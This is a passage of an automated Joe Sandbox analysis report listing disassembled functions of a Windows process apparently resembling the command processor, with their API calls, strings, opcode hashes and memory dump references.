                                                                                        • Part of subcall function 00007FF793751EA0: wcschr.MSVCRT(?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF793770D54), ref: 00007FF793751EB3
                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79375706E
                                                                                      • wcsncmp.MSVCRT ref: 00007FF7937570A5
                                                                                      • wcsstr.MSVCRT ref: 00007FF79375F9DB
                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79375FA00
                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79375FA5F
                                                                                        • Part of subcall function 00007FF79375823C: FindFirstFileExW.KERNELBASE ref: 00007FF793758280
                                                                                        • Part of subcall function 00007FF79375823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF79375829D
                                                                                        • Part of subcall function 00007FF793753A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79376EAC5,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793753A56
                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79375FA3D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                      • String ID: \\.\
                                                                                      • API String ID: 799470305-2900601889
                                                                                      • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                      • Instruction ID: 78fcfda04d286d8d36307b4547c840b4ee343c0d416eac75f61e97e796b4fb34
                                                                                      • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                      • Instruction Fuzzy Hash: 6C51C632A08AC2D5EBB4AF3098802B9B7A8FB8DB44F854432DA0E57794DF3CD5458360
                                                                                      Function 00007FF793748B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 1944892715-0
                                                                                      • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                      • Instruction ID: 7b37c3d1a07901ac025dd809c07376a94f3a6a2028d85051724b513da7ad6988
                                                                                      • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                      • Instruction Fuzzy Hash: 34B16E21A0964696FAB4BF31A4D4179E6E9EF5DB81F848436CA4E67390DF3DF840C720
                                                                                      Function 00007FF793745458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937454DE
                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79374552B
                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79374554F
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79376345F
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF79376347E
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF7937634C3
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937634DB
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF793741F7D), ref: 00007FF7937634FA
                                                                                        • Part of subcall function 00007FF7937536EC: _get_osfhandle.MSVCRT ref: 00007FF793753715
                                                                                        • Part of subcall function 00007FF7937536EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793753770
                                                                                        • Part of subcall function 00007FF7937536EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1356649289-0
                                                                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                      • Instruction ID: c000d74624fd621b7466c00a574dfc986b737c201593487bc6bb37929b778517
                                                                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                      • Instruction Fuzzy Hash: 6B917F21A08A4687F6B4AF31A494179F6E9FB8CB95F844135DA4E537A1DF3CE440CB20
                                                                                      Function 00007FF7937686FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                      • String ID: %s$/-.$:
                                                                                      • API String ID: 1644023181-879152773
                                                                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                      • Instruction ID: aeac9cb9940b88842d9ce2b53cf5941d8fa69a58116db7f42706ec462fbae9c6
                                                                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                      • Instruction Fuzzy Hash: 1991A721A18A42A1FFB4AB70D4E01B9E2A8FF4879CFC44135D94E626D4DE3CE945C721
                                                                                      Function 00007FF79376627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793767251), ref: 00007FF79376628E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSingleWait
                                                                                      • String ID: wil
                                                                                      • API String ID: 24740636-1589926490
                                                                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                      • Instruction ID: e98b5bbac58c6f8cdff538bd60884a6c5db85c4bf432beaeb00bd8504224ede2
                                                                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                      • Instruction Fuzzy Hash: 6F416531A0C94287F7B06B32D490279F6A9EF8D799FD48131D90A66BD4CF3DD8448B62
                                                                                      Function 00007FF79376CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                      • String ID: $Application$System
                                                                                      • API String ID: 3377411628-1881496484
                                                                                      • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                      • Instruction ID: 1aaa3edf4602bb337c4ea5024d201234578287baf15457a2d6a8d4f4e790f551
                                                                                      • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                      • Instruction Fuzzy Hash: 06414B32B04B429AF7609B70E4903EDB7A9EB8D749F845135DA4E62B58DF38D105C750
                                                                                      Function 00007FF7937414E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                      • String ID: :$\
                                                                                      • API String ID: 3961617410-1166558509
                                                                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                      • Instruction ID: fa47087e754129d80a86fc7e85d01821bd6395d66f91e657b4b3b4f8eceb8644
                                                                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                      • Instruction Fuzzy Hash: FF216021A0C64287F7F07B70A4C81B9F6A6EB4DB95BC48135D91F92390DF3CE5458A61
                                                                                      Function 00007FF793747AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                      • String ID:
                                                                                      • API String ID: 1397130798-0
                                                                                      • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                      • Instruction ID: aa464612050934eb207311529242a3a61eef96acc71bb401d3945ab4316c2b69
                                                                                      • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                      • Instruction Fuzzy Hash: D6919722B0878196FAF9AB2094806B9F3AAFF4CB85FC58135D94E57794DF3CE5408721
                                                                                      Function 00007FF79375258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF7937525CA
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF7937525E8
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79375260F
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF793752636
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF793752650
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$Heap$AllocProcess
                                                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                      • API String ID: 3407644289-1668778490
                                                                                      • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                      • Instruction ID: 9b743320406c3be6e4fdd9bef5d785c2b17e32cd3df2790ac0c79416e7035359
                                                                                      • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                      • Instruction Fuzzy Hash: C1314A21A1950285FBF87F31E894379A69CEF8CB81F848036DA0E666A5DE3CE400C731
                                                                                      Function 00007FF793770C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                      • API String ID: 2516562204-381716982
                                                                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                      • Instruction ID: aa7d0cb0eac1dd73118cf42449474f98e79b04eaa4e146037dd7c3d2932e6f8f
                                                                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                      • Instruction Fuzzy Hash: 5CC1B332A1475186EBA4AF35E88027DB7A9FB48B95F841135DE8E23B94DF3CE451C710
                                                                                      Function 00007FF793757E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • iswspace.MSVCRT ref: 00007FF793757EEE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                      • String ID: A
                                                                                      • API String ID: 3731854180-3554254475
                                                                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                      • Instruction ID: 874ebc4ca28396149b0c918270e8beb7ce07b2eeef76d3d5ccb9e5e1420987f5
                                                                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                      • Instruction Fuzzy Hash: 3AA18E6190DA828AE6B4BB31A4D0279FBA8FF4D795F808135CA4D67794DF3CE441CB21
                                                                                      Function 00007FF79376A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                      • API String ID: 1580871199-2613899276
                                                                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                      • Instruction ID: 1921bc16ed3cf21867fa327457d1339c8256a6163ee221cf4e34f866a4cf1b5e
                                                                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                      • Instruction Fuzzy Hash: 9551D671A18B8282EBB09B35E890179B7B8FB8CB85F845135DA5E23744DF3CD501C761
                                                                                      Function 00007FF793747420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                      • String ID: con
                                                                                      • API String ID: 689241570-4257191772
                                                                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                      • Instruction ID: 4f2d9c250f1c328cb953fb397fb5bc3b1e5c410440253738f46b4d7f91ead79a
                                                                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                      • Instruction Fuzzy Hash: EE41C731A08B4586E260AF25A484379FA99F74DBA5F958334DA6E233D0CF3CD949C750
                                                                                      Function 00007FF79376A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                      Download Yara Rule
